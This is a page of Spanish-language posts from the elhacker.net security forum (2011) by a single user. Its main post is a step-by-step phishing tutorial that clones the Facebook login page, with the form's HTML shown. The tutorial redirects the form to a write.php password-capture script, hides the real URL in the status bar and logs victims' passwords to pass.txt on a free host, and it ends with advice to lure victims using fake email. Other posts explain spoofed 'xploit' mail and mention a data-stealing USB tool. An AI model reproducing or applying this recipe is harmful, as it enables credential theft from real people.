elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11]
101  Seguridad Informática / Bugs y Exploits / Re: phishing fakebuuk en: 21 Febrero 2011, 04:03 am
Hola JuszR,  un xploit seria el mail seria el fake mail y este es una fake page.

Citar
XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.

Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

PHISHING
Ver en wiki

Espero que la explicación resuelva tus dudas  :D
102  Seguridad Informática / Bugs y Exploits / phishing fakebuuk en: 8 Febrero 2011, 04:42 am
Bueno este es un ejemplo de phishing
.
.
.
Todo lo que viene a continuación esta hecho con fines educativos y el autor no se hace responsable por el mal uso que se hicieren de este material... :xD

Cosas que vamos a necesitar:  :P

     +Conocimietos basicos de html y php 
     +Archivo index.htm con la fake page
     +Archivo write.php con el script capture pass
     +Archivo pass.txt donde se guardaran las pass
    
Paso1.-
Abrimos con el firefox la página objetivo, en este caso el www dot f a c e b o o k dot com

Paso2.-
Abrimos el source code, copiamos todo en un notepad y lo guardamos con el nombre y extención: index.htm

3.-Buscamos los campos el formulario donde se pone el user y pass.
Código:
<form method=GET action=write.php id="https://login.facebook.com/login.php?login_attempt=1" id="login_form" id=" Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="nu3-U" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_LA" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Dirección de correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u010237_3"><input value="Entrar" tabindex="4" type="submit" id="u010237_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">No cerrar sesión</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">¿Has olvidado tu contraseña?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="nu3-U" autocomplete="off" /></form>


4.- Editamos donde empieza el form y cambiamos:
Código:
<form method=GET action=write.php
...esto hace que el form ejecute a write.php con la función GET

5.- Editamos en el boton imput entrar:
Código:
<input value="Entrar" onmouseover="window.status='www.facebook.com';return true" onmouseout="window.status='';return true" tabindex="4" type="submit" id="u010237_3" />
... para que no se vea la url en la barra de estado...

no pongo todo el code pq es muuuy largo :xD


6.- buscamos un hosting gratis ó en alguno que tengamos corriendo nuestra shell y los subimos (este ejemplo: esta testeado en m i a r r o b a)

7.-En nuestro host creamos el archivo pass.txt (donde se guardaran las contraseñas)

8.-Ahora tenemos hecho el 50% del trabajo,  toca hacer el fakemail, launcher ó xploit. Aunque un poco de ing. social funciona.
  
Nota.- No necesariamente tiene que ser en un txt donde guardes los passwords ya que puedes mandarlo a un correo, celular ó guardar los datos a una base de datos.  Como ven no tiene mucha ciencia los cripts en si.

Ahhh y tampoco garantiza el 100% de efectividad por ejemplo si la victima ve la URL: xD ya fue..... te pillaron xDDDD


Si bien hay mejores versiones de phishing a fb, esta es la mía y esta en español :D
y solo quería comprobar lo que se puede hacer :)
103  Seguridad Informática / Hacking / Re: USB STEALER 2 - Roba datos de una USB en modo invisible! en: 1 Febrero 2011, 23:49 pm
Tiene un bug medio pelotudo, si el usuario no guarda la contraseña, quiero decir si guardo un contraseña en blanco ya no puede entrar más.

Es decir si por error abrió la opción para cambiar el pass y no entro el pass sino que cerro la opción luego ya no se puede entrar. VALGA LA REDUNDANCIA... :rolleyes:

Al tratar de entrar sale un mensaje de error que dice: "texto my corto"

Solución: reinstalar el programa. ;)
Páginas: 1 2 3 4 5 6 7 8 9 10 [11]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines